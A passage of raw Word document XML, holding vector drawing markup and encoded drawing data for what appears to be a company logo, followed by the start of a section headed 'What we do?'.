                <v:shape id="Shape 132" o:spid="_x0000_s1124" style="position:absolute;left:53644;top:3311;width:705;height:686;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="70459,685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foMIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTU8CMRC9m/gfmiHhJi1IjK4U4pKYAJ5YjV4n23G7&#10;cTtd2gLLv6cmJt7m5X3OYjW4TpwoxNazhulEgSCuvWm50fDx/nr3CCImZIOdZ9JwoQir5e3NAgvj&#10;z7ynU5UakUM4FqjBptQXUsbaksM48T1x5r59cJgyDI00Ac853HVyptSDdNhybrDY09pS/VMdnYbw&#10;WR12T7ZU2/JLvZGPZajne63Ho+HlGUSiIf2L/9wbk+ffz+D3mXyBX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6R+gwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m34518,c44843,,52514,1473,57531,4394v5016,2921,8471,7239,10363,12967l49073,20383v-801,-2552,-2325,-4508,-4573,-5868c42240,13157,39039,12484,34874,12484v-5258,,-9030,635,-11303,1917c22060,15303,21310,16472,21310,17920v,1232,661,2286,1982,3149c25095,22225,31305,23850,41935,25946v10630,2096,18060,4674,22276,7722c68376,36754,70459,41059,70459,46571v,6020,-2895,11188,-8674,15507c56019,66408,47472,68567,36144,68567v-10274,,-18402,-1816,-24397,-5436c5766,59499,1841,54584,,48361l20027,45707v852,3378,2579,5944,5182,7696c27813,55156,31458,56020,36144,56020v5169,,9055,-813,11659,-2464c49555,52400,50431,50864,50431,48920v,-1321,-482,-2400,-1422,-3276c48006,44831,45783,44069,42329,43370,26225,40272,16027,37452,11722,34899,5753,31356,2768,26441,2768,20142v,-5689,2579,-10465,7734,-14325c15672,1943,23673,,34518,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,70459,68567"/>
                </v:shape>
                <v:shape id="Shape 133" o:spid="_x0000_s1125" style="position:absolute;left:53144;top:3094;width:445;height:903;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="44463,90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k2QsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4KbqxQikxGwmhQg+C1JTS45gd&#10;k9jsbMxuNP57t1DwNo/3OclqNK04U+8aywrmswgEcWl1w5WCr2I9fQPhPLLG1jIpuJKDVfr4kGCs&#10;7YU/6bzzlQgh7GJUUHvfxVK6siaDbmY74sAdbG/QB9hXUvd4CeGmlS9R9CoNNhwaauwor6n83Q1G&#10;wWaeXY8/+/aUv3d2nxffz0W2HZSaPI3ZEoSn0d/F/+4PHeYvFvD3TLh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2TZCxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m29185,r,23165l42825,23165r,13843l29185,37008r,26428c29185,68796,29312,71907,29578,72796v267,889,852,1613,1779,2185c32284,75565,33401,75857,34722,75857v1854,,4534,-558,8026,-1676l44463,87643v-4648,1740,-9906,2603,-15774,2603c25095,90246,21844,89713,18961,88671,16066,87618,13957,86258,12598,84595,11252,82918,10313,80671,9792,77826,9373,75806,9157,71730,9157,65596r,-28588l,37008,,23165r9157,l9157,10135,29185,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,44463,90246"/>
                </v:shape>
                <v:shape id="Shape 134" o:spid="_x0000_s1126" style="position:absolute;left:50332;top:3061;width:707;height:921;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="70701,92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6lysMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF74L/IYzgTVN1FalGkaIge1BWK16HZmyL&#10;zaQ0Ueu/3wgLe5vhvXnfm+W6NZV4UuNKywpGwwgEcWZ1ybmC9LwbzEE4j6yxskwK3uRgvep2lhhr&#10;++Ifep58LkIIuxgVFN7XsZQuK8igG9qaOGg32xj0YW1yqRt8hXBTyXEUzaTBkgOhwJqSgrL76WE+&#10;3DSZRXqaXo+XSZnk2wP674NS/V67WYDw1Pp/89/1Xof6ky/4PBMm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C6lysMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m10261,c22199,,32804,2019,42088,6058v9271,4025,16370,9766,21272,17196c68250,30683,70701,38811,70701,47625v,10490,-3709,19989,-11151,28473c50228,86804,38265,92151,23685,92151v-3924,,-6883,-597,-8877,-1791c12814,89167,11493,87414,10833,85115l,89058,,79773r2870,-652c4673,78295,6452,77000,8204,75222v2502,-2502,4674,-6172,6502,-10986c16523,59410,17437,54927,17437,50774v,-4661,-1245,-8229,-3734,-10718c11214,37567,8077,36322,4292,36322l,37881,,25798r2667,-601c11087,25197,17323,28003,21336,33604r1778,-6858l41872,26746,31140,71031v-660,2794,-990,4610,-990,5436c30150,77495,30416,78270,30962,78778v547,521,1194,775,1956,775c35192,79553,38125,78359,41732,75971v4826,-3137,8725,-7328,11710,-12598c56426,58102,57924,52642,57924,47003v,-10135,-4216,-18606,-12648,-25414c36855,14770,25082,11367,9982,11367l,13453,,2053,10261,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,70701,92151"/>
                </v:shape>
                <v:shape id="Shape 11581" o:spid="_x0000_s1127" style="position:absolute;left:55421;top:3808;width:200;height:174;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="19964,173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fz4MMA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMIIX0bTKilSjiCDKwrLYCl6HZmyL&#10;zaQ0sdZ/v1lY2Ns83udsdr2pRUetqywriGcRCOLc6ooLBdfsOF2BcB5ZY22ZFLzJwW47HGww0fbF&#10;F+pSX4gQwi5BBaX3TSKly0sy6Ga2IQ7c3bYGfYBtIXWLrxBuajmPoqU0WHFoKLGhQ0n5I30aBd+3&#10;/r74nGc+oyY+fE3MoitOJ6XGo36/BuGp9//iP/dZh/nxxyqG33fCDX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jfz4MMAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l19964,r,17361l,17361,,e" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,19964,17361"/>
                </v:shape>
                <v:shape id="Shape 136" o:spid="_x0000_s1128" style="position:absolute;left:55780;top:3584;width:334;height:413;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="33414,41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M48MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRCF7wX/Qxiht5qoKLI1ighqDyJqe/A4bKa7&#10;oZvJsonutr/eCEJvM7z3vXkzX3auEjdqgvWsYThQIIhzbywXGr4+N28zECEiG6w8k4ZfCrBc9F7m&#10;mBnf8olu51iIFMIhQw1ljHUmZchLchgGviZO2rdvHMa0NoU0DbYp3FVypNRUOrScLpRY07qk/Od8&#10;danG/jC72PYY5Opy4u3fQU12Vmn92u9W7yAidfHf/KQ/TOLGU3g8kya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4zjwxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m33414,r,11368l23863,14026v-2603,1613,-3911,3646,-3911,6122c19952,22574,20993,24669,23076,26447v2083,1765,4737,2654,7963,2654l33414,28390r,11493l25070,41332v-7773,,-13894,-1842,-18364,-5499c2235,32162,,27539,,21938,,18230,1016,14928,3048,12020,5080,9124,7938,6890,11608,5352,15278,3803,20574,2457,27483,1301l33414,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,33414,41332"/>
                </v:shape>
                <v:shape id="Shape 137" o:spid="_x0000_s1129" style="position:absolute;left:55801;top:3314;width:313;height:212;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="31356,212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ej8cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPW2sCMRCF3wX/Qxihb5q1hVZW4yJSpaWIeAHxbdzM&#10;XnQzWTepbv99Uyj4NsM5c843k6Q1lbhR40rLCoaDCARxanXJuYL9btEfgXAeWWNlmRT8kINk2u1M&#10;MNb2zhu6bX0uQgi7GBUU3texlC4tyKAb2Jo4aJltDPqwNrnUDd5DuKnkcxS9SoMlh4YCa5oXlF62&#10;30YBna/r4+jwdVousoCymr2vPteRUk+9djYG4an1D/P/9YcO+C9v8PdMmE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MxHo/HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m31356,r,13037l31242,13015v-3544,,-6312,609,-8306,1828c20955,16049,19342,18183,18110,21231l,18386c2032,12049,5537,7350,10503,4302l31356,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,31356,21231"/>
                </v:shape>
                <v:shape id="Shape 138" o:spid="_x0000_s1130" style="position:absolute;left:54848;top:3077;width:366;height:908;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="36583,908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JDQ8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74L/YRmhN93YQgnRVaQg9uLBqPchO2ZD&#10;s7Mhu5ror+8cCr3N8N689816O/pWPaiPTWADy0UGirgKtuHawOW8n+egYkK22AYmA0+KsN1MJ2ss&#10;bBj4RI8y1UpCOBZowKXUFVrHypHHuAgdsWi30HtMsva1tj0OEu5b/Z5ln9pjw9LgsKMvR9VPefcG&#10;difsyqCHfPl8uaw54HU85ntj3mbjbgUq0Zj+zX/X31bwP4RWnpEJ9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QkNDwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m16618,l36583,r,90551l18040,90551r,-9640c14967,84658,11335,87452,7144,89281l,90833,,78247r146,74c4731,78321,8642,76619,11855,73228v3226,-3404,4839,-8471,4839,-15227c16694,50470,15132,45047,12008,41732l,36757,,25665r16618,6949l16618,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,36583,90833"/>
                </v:shape>
                <v:shape id="Shape 11582" o:spid="_x0000_s1131" style="position:absolute;left:57448;top:3808;width:200;height:174;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="19964,173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Vtl8MA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwix4EU1bcZFqlEVYXAQR7YLXoRnb&#10;YjMpTazdf28Ewds83ucs172pRUetqywriCcRCOLc6ooLBX/Zz3gOwnlkjbVlUvBPDtarj8ESU23v&#10;fKTu5AsRQtilqKD0vkmldHlJBt3ENsSBu9jWoA+wLaRu8R7CTS2TKPqSBisODSU2tCkpv55uRsHh&#10;3F+muyTzGTXxZj8y067YbpUafvbfCxCeev8Wv9y/OsyPZ/MEnu+EG+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uVtl8MAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l19964,r,17361l,17361,,e" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,19964,17361"/>
                </v:shape>
                <v:shape id="Shape 140" o:spid="_x0000_s1132" style="position:absolute;left:57840;top:3326;width:686;height:671;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="68606,670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LimMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQU8CMRCF7yb+h2ZMvBjoYoiYlUJEo3IjIAkcJ9tx&#10;u3E73bRlWf69cyDxNpP35r1v5svBt6qnmJrABibjAhRxFWzDtYH998foGVTKyBbbwGTgQgmWi9ub&#10;OZY2nHlL/S7XSkI4lWjA5dyVWqfKkcc0Dh2xaD8hesyyxlrbiGcJ961+LIon7bFhaXDY0Zuj6nd3&#10;8gYe+tW7m3q/j/p0vMxWn4fDZvJlzP3d8PoCKtOQ/83X67UV/KngyzMygV7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xLimMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m,l19951,r,30137c19951,39370,20320,45021,21057,47091v736,2084,2069,3735,4013,4953c27013,53251,29476,53860,32461,53860v3404,,6465,-813,9157,-2438c44323,49796,46165,47777,47155,45364v1003,-2400,1499,-8306,1499,-17690l48654,,68606,r,65595l50076,65595r,-9817c47320,59271,43714,62039,39243,64046v-4483,2019,-9195,3035,-14173,3035c20003,67081,15456,66116,11430,64173,7404,62242,4496,59524,2692,56019,901,52527,,47688,,41504l,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,68606,67081"/>
                </v:shape>
                <v:shape id="Shape 141" o:spid="_x0000_s1133" style="position:absolute;left:56597;top:3311;width:711;height:686;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="71171,685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lxtsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/Y/hBv4pqlDRKpRysbAwRDsxmBvZ3M2&#10;dc2lJFG7/94Igm/38f285bq3rTiTD41jBZNxBoK4crrhWsH31/toDiJEZI2tY1LwTwHWq6fBEnPt&#10;LryjcxlrkUI45KjAxNjlUobKkMUwdh1x4g7OW4wJ+lpqj5cUblv5kmUzabHh1GCwo1dD1V95sgqy&#10;st1s30x/NMWevf48ffx0xa9Sw+e+WICI1MeH+O7e6DR/OoHbM+kCub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eXG2wgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m36576,v9182,,16485,1727,21908,5169c63907,8598,67806,13843,70167,20879l50495,23964v-660,-3416,-2159,-5981,-4508,-7708c43637,14515,40602,13652,36856,13652v-4966,,-8929,1499,-11901,4483c21997,21120,20523,26111,20523,33109v,7785,1499,13284,4509,16497c28042,52819,32080,54419,37148,54419v3784,,6883,-939,9296,-2807c48857,49733,50572,46520,51562,41948r19609,2896c69126,52667,65227,58572,59449,62573v-5779,3987,-13526,5994,-23228,5994c25184,68567,16396,65532,9830,59486,3277,53429,,45047,,34341,,23520,3289,15087,9868,9055,16447,3022,25349,,36576,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,71171,68567"/>
                </v:shape>
                <v:shape id="Shape 142" o:spid="_x0000_s1134" style="position:absolute;left:56114;top:3311;width:374;height:671;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="37389,67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yE4sMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/oflin0VjcNpUh0I9JS7UXRtBdvQ3by&#10;aLOzMbuJ8d+7guBtPr7nzBejacRAnastK3idRCCIc6trLhX8/ny9TEE4j6yxsUwKzuRgkT4+zDHR&#10;9sR7GjJfihDCLkEFlfdtIqXLKzLoJrYlDlxhO4M+wK6UusNTCDeNjKPoXRqsOTRU2NJHRfl/1hsF&#10;q2P8N0z77XJt9DHqebf5LA4bpZ6fxuUMhKfR38U397cO899iuD4TLpDp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yE4sMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1308,v8903,,15532,927,19888,2756c25552,4584,28626,6908,30404,9728v1765,2832,2654,8001,2654,15545l32855,45529v,5766,317,10008,952,12751c34442,61023,35649,63957,37389,67081r-19736,c17132,65925,16484,64224,15735,61950v-330,-1028,-571,-1701,-711,-2031c11608,62801,7963,64960,4089,66408l,67118,,55625,7925,53251v2413,-1575,4000,-3480,4749,-5753c13195,46024,13462,43205,13462,39039r,-3454c10897,36322,6858,37211,1308,38240l,38604,,27236,13462,24282r,-1727c13462,19215,12509,16840,10617,15418l,13307,,270,1308,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,37389,67118"/>
                </v:shape>
                <v:shape id="Shape 143" o:spid="_x0000_s1135" style="position:absolute;left:58736;top:3077;width:698;height:905;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="69761,90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pyXcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMIK3NfWBSjWKCoLiHnZ9oN6GZmyL&#10;zaQ0Ubv/frOw4G0+vudM57UpxJMql1tW0O1EIIgTq3NOFRwP648xCOeRNRaWScEPOZjPmo0pxtq+&#10;+Juee5+KEMIuRgWZ92UspUsyMug6tiQO3M1WBn2AVSp1ha8QbgrZi6KhNJhzaMiwpFVGyX3/MAqu&#10;S/NplufT11Zet5tdbQejYf+iVLtVLyYgPNX+Lf53b3SYP+jD3zPhAj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jpyXcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l19964,r,48057l43332,24956r24575,l42126,48920,69761,90551r-21526,l29273,61087r-9309,8458l19964,90551,,90551,,xe" fillcolor="#1e487a" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="66585f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,69761,90551"/>
                </v:shape>
                <v:rect id="Rectangle 144" o:spid="_x0000_s1136" style="position:absolute;left:59447;top:2646;width:467;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pTicMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9NRtLEE1dRbSix1aFtLchO02C&#10;2dmQXZPUX98tCN7m8T5nsRpMLTpqXWVZwSSKQRDnVldcKDifdi8zEM4ja6wtk4JfcrBajp4WmGrb&#10;8yd1R1+IEMIuRQWl900qpctLMugi2xAH7se2Bn2AbSF1i30IN7V8jeOpNFhxaCixoU1J+eV4NQr2&#10;s2b9dbC3vqjfv/fZRzbfnuZeqefxsH4D4WnwD/HdfdBhfpLA/zPhAr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mpTicMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 8826" o:spid="_x0000_s1137" type="#_x0000_t75" style="position:absolute;left:53530;top:8267;width:5398;height:67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UaoODFAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrAjEUhO+F/ofwBG816yK6bI0ihUIv&#10;HoxC8fbYvG6Wbl6WJK7rv28KhR6HmfmG2e4n14uRQuw8K1guChDEjTcdtwou5/eXCkRMyAZ7z6Tg&#10;QRH2u+enLdbG3/lEo06tyBCONSqwKQ21lLGx5DAu/ECcvS8fHKYsQytNwHuGu16WRbGWDjvOCxYH&#10;erPUfOubU3C6XVf22I/nQ2iu5afe6PGoH0rNZ9PhFUSiKf2H/9ofRkFVlWv4fZOfgNz9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lGqDgxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId19" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="49" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5768340" cy="218237"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8841" name="Group 8841"/>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1583" name="Shape 11583"/>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181" name="Rectangle 181"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="0"/>
                            <a:ext cx="1250833" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>What we do?</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="182" name="Rectangle 182"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="958611" y="0"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8841" o:spid="_x0000_s1138"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HiCRQMAAMkJAAAOAAAAZHJzL2Uyb0RvYy54bWzEVm1vmzAQ/j5p/8Hi+8pLSkJQkmpq12rS&#10;tFZt9wMcMC+SsZHthGS/fucDk7TZuq2TukSCw74X33N3Dywudg0nW6Z0LcXSC88CjzCRybwW5dL7&#10;9nj9IfGINlTklEvBlt6eae9i9f7domtTFslK8pwpAk6ETrt26VXGtKnv66xiDdVnsmUCNgupGmrg&#10;UZV+rmgH3hvuR0Ew9Tup8lbJjGkNq1f9prdC/0XBMnNbFJoZwpcenM3gVeF1ba/+akHTUtG2qrPh&#10;GPQVp2hoLSDo6OqKGko2qj5x1dSZkloW5iyTjS+Los4Y5gDZhMGzbG6U3LSYS5l2ZTvCBNA+w+nV&#10;brOv2ztF6nzpJcl56BFBG6gSBia4AgB1bZmC3o1qH9o7NSyU/ZPNeVeoxt4hG7JDaPcjtGxnSAaL&#10;8WyaTM6hAhnsRWESTWY99lkFBToxy6pPLxv6LqxvTzcepmuhjfQBKf1vSD1UtGVYAG0RGJAKwziZ&#10;OKhQhfRLCA1qjkDpVANmv0QpnEfBpAfip0iFsziaYpeOCdM022hzwyRiTrdftOmbOHcSrZyU7YQT&#10;FYzCi0PQUmPt7FGtSLqjolUw2v1J7HYjt+xRoqJ5Vjk45WGXi2OtsQNcc4Cu03D3Fv0daz4BwKm5&#10;e68OTQUu/1jRodk7gUPYbFeLQUAEQD7GmAsLhu1dCgxVcGpw1JvaAHXxuoHg0SwIDo7Bm23EvvIo&#10;mT1nFjAu7lkB44ZjYhe0KteXXJEttQSFP9sOiA2oWpWi5ny0CjH0E6vryP4Hq0HZ2jGkv9Ey6C2z&#10;IWDPgcAkkJdjQog6GmFkKcxoL4C/MchRQlZcy3yPrIA5w/BZwniLKUxGurqH3qai5IyEsPg3UwhE&#10;lMAbyrUk5D/QThjFQTKBKUe+mgdRHA8IO7ZrVT+FxApLz84XIuwm0jbUoGKx5MJehbyGaroCn/SJ&#10;2a13SMbh3KXRw0sqqb7fwnu24BJ6EQYQJY/wzwI4DmponKCcsHaCMvxS4vuvP8LHjZFFbVkDS9ZH&#10;GB7esn6R49Dj+mEj2wYCvv09i87jZBpCH5wWMJ5OwvP/Vb4IueAwHW9bPnwlwvcC0sjwbWM/SI6f&#10;sdyHL7DVDwAAAP//AwBQSwMEFAAGAAgAAAAhAAPdXPLdAAAABAEAAA8AAABkcnMvZG93bnJldi54&#10;bWxMj0FrwkAQhe8F/8Myhd7qJpqKTbMRkbYnKaiF0tuYHZNgdjZk1yT++257qZeBx3u89022Gk0j&#10;eupcbVlBPI1AEBdW11wq+Dy8PS5BOI+ssbFMCq7kYJVP7jJMtR14R/3elyKUsEtRQeV9m0rpiooM&#10;uqltiYN3sp1BH2RXSt3hEMpNI2dRtJAGaw4LFba0qag47y9GwfuAw3oev/bb82lz/T48fXxtY1Lq&#10;4X5cv4DwNPr/MPziB3TIA9PRXlg70SgIj/i/G7znaJmAOCqYJwnIPJO38PkPAAAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhAODoeIJFAwAAyQkAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhAAPdXPLdAAAABAEAAA8AAAAAAAAAAAAAAAAAnwUAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACpBgAAAAA=&#10;">
                <v:shape id="Shape 11583" o:spid="_x0000_s1139" style="position:absolute;top:192;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u/p8QA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/ofwgi91awWRbZGkUpRvPkAPQ7JdHfZ&#10;zWRJ4rrtr28Ewdt8fM+ZL3vbiI58qBwrGA0zEMTamYoLBafj9/sMRIjIBhvHpOCXAiwXry9zzI27&#10;8Z66QyxECuGQo4IyxjaXMuiSLIaha4kT9+O8xZigL6TxeEvhtpHjLJtKixWnhhJb+ipJ14erVaDP&#10;nd/pa735O8XL5rLfHmst10q9DfrVJ4hIfXyKH+6tSfNHk9kH3N9JN8jF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7v6fEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l5768340,r,175260l,175260,,e" fillcolor="#f2f2f2" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5768340,175260"/>
                </v:shape>
                <v:rect id="Rectangle 181" o:spid="_x0000_s1140" style="position:absolute;left:182;width:12509;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RKi8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTezEYPJaZZRapijq0R0t6G7DQJ&#10;zc6G7Nak/fXdQsHbPN7nZLvJdOJGg2stK1hFMQjiyuqWawXX4rRMQDiPrLGzTAq+ycFuO59lmGo7&#10;8ivdLr4WIYRdigoa7/tUSlc1ZNBFticO3IcdDPoAh1rqAccQbjq5juNHabDl0NBgT88NVZ+XL6Pg&#10;nPT7t9z+jHV3fD+XL+XmUGy8Ug+Laf8EwtPk7+J/d67D/GQFf8+EC+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aRKi8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
